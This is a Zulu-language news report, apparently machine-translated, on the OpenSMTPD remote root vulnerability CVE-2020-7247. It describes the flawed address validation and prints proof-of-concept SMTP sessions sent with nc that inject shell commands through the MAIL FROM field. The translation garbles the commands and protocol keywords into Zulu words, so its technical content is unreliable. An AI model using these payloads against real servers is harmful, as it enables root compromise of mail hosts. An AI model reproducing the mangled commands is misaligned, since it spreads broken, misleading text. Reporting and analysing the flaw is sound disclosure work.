Kuseva yemeyili eyakhiwe iphrojekthi ye-OpenBSD ikhonjiwe (CVE-2020-7247), ekuvumela ukuthi usebenzise ukude imiyalo yegobolondo kuseva enamalungelo omsebenzisi wezimpande. Ukuba sengozini kuhlonzwe ngesikhathi sokuhlolwa kabusha okwenziwe yi-Qualys Security (ucwaningo lwangaphambilini lwe-OpenSMTPD ngo-2015, futhi ubungozi obusha bukhona kusukela ngoMeyi 2018). Inkinga ekukhishweni kwe-OpenSMTPD 6.6.2. Bonke abasebenzisi bayanconywa ukuthi bafake ngokushesha isibuyekezo (ku-OpenBSD, isichibi singafakwa nge-syspatch).
Kuhlongozwa izinketho ezimbili zokuhlasela. Inketho yokuqala isebenza ekucushweni okuzenzakalelayo kwe-OpenSMTPD (ukwamukela izicelo ezisuka ku-localhost kuphela) futhi ikuvumela ukuthi usebenzise inkinga endaweni, lapho umhlaseli ekwazi ukufinyelela isixhumi esibonakalayo senethiwekhi yendawo (i-loopback) kuseva (isibonelo, kumasistimu wokubamba) . Inketho yesibili yenzeka lapho i-OpenSMTPD ilungiselelwe ukwamukela izicelo zenethiwekhi yangaphandle (iseva yemeyili eyamukela imeyili yenkampani yangaphandle). Abacwaningi balungise isibonelo sokuxhashazwa esisebenza ngempumelelo kokubili ngenguqulo ye-OpenSMTPD efakwe ku-OpenBSD 6.6 kanye nenguqulo ephathekayo yamanye amasistimu okusebenza (okwenziwa Ekuhlolweni kwe-Debian).
Inkinga ibangelwa iphutha kumsebenzi we-smtp_mailaddr(), obizwa ukuhlola ukufaneleka kwamanani ezinkambini ze-"MAIL FROM" kanye ne-"RCPT TO" ezichaza umthumeli/umamukeli futhi adluliselwe phakathi nokuxhumeka. ngeseva yemeyili. Ukuhlola ingxenye yekheli le-imeyili eliza ngaphambi kophawu elithi “@”, smtp_mailaddr() umsebenzi ubizwa ngokuthi.
valid_localpart(), eyamukela (MAILADDR_ALLOWED) izinhlamvu "!#$%&'*/?^`{|}~+-=_", njengoba kudingwa i-RFC 5322.
Kulesi simo, ukuphunyuka okuqondile kweyunithi yezinhlamvu kwenziwa kumsebenzi we-mda_expand_token(), omiselela kuphela izinhlamvu ezithi “!#$%&'*?`{|}~” (MAILADDR_ESCAPE). Ngokulandelayo, ulayini olungiselelwe kokuthi mda_expand_token() usetshenziswa lapho kubizwa umenzeli wokulethwa (MDA) kusetshenziswa umyalo othi 'execle("/bin/sh", "/bin/sh", "-c", mda_command,...' . Uma kufakwa izinhlamvu ku-mbox nge-/bin/sh, ulayini “/usr/libexec/mail.local -f %%{mbox.from} %%{username}” kwethulwa, lapho inani elithi “% {mbox.from}” ihlanganisa idatha ephunyukile kupharamitha ethi "MAIL FROM".
Ingqikithi yokuba sengozini iwukuthi smtp_mailaddr() inephutha elinengqondo, ngenxa yokuthi, uma isizinda esingenalutho sithunyelwa ku-imeyili, umsebenzi ubuyisela ikhodi yokuqinisekisa eyimpumelelo, ngisho noma ingxenye yekheli ngaphambi kuka-“@” iqukethe izinhlamvu ezingavumelekile. . Ngaphezu kwalokho, lapho ulungiselela iyunithi yezinhlamvu, umsebenzi we-mda_expand_token() awuphunyuki kuzo zonke izinhlamvu ezikhethekile zegobolondo ezingaba khona, kodwa izinhlamvu ezikhethekile kuphela ezivunyelwe ekhelini le-imeyili. Ngakho, ukuze usebenzise umyalo wakho, kwanele ukusebenzisa uphawu oluthi “;” engxenyeni yendawo ye-imeyili. nesikhala, esingafakiwe kusethi ye-MAILADDR_ESCAPE futhi asibalekelwanga. Ngokwesibonelo:
$nc 127.0.0.1 25
HELO uprofesa.falken
IMEYILI EVELA:<;lala 66;>
I-RCPT TO:
IDATHA
.
QUIT
Ngemva kwalesi sikhathi, i-OpenSMTPD, lapho ilethwa ku-mbox, izokwethula umyalo ngegobolondo
/usr/libexec/mail.local -f ;ukulala 66; impande
Ngesikhathi esifanayo, amathuba okuhlasela anqunyelwe ukuthi ingxenye yendawo yekheli ayikwazi ukudlula izinhlamvu ezingu-64, kanye nezinhlamvu ezikhethekile '$' kanye ne-'|' athathelwa indawo ngokuthi ":" lapho ebaleka. Ukuze sidlule lo mkhawulo, sisebenzisa iqiniso lokuthi indikimba yencwadi idluliswa ngemuva kokusebenza /usr/libexec/mail.local ngokusakaza okokufaka, i.e. Ngokukhohlisa ikheli, ungakwazi ukuqalisa kuphela isitolika somyalo we-sh futhi usebenzise umzimba wencwadi njengesethi yemiyalelo. Njengoba izihloko zesevisi ye-SMTP zikhonjisiwe ekuqaleni kohlamvu, kuphakanyiswa ukuthi usebenzise umyalo ofundwayo ku-loop ukuze weqe. Uhlelo lokusebenza lubukeka kanjena:
$nc 192.168.56.143 25
HELO uprofesa.falken
IMEYILI EVELA KU:<;ngoba mina ku 0 1 2 3 4 5 6 7 8 9 abcd;funda r;qedile;sh;phuma 0;>
I-RCPT TO:[i-imeyili ivikelwe]>
IDATHA
#0
#1
...
#d
ngoba mina ku-WOPR; yenza
echo -n "($i) " && id || ikhefu
kwenziwe > /root/x."`id -u`.""$$"
.
QUIT
Source: opennet.ru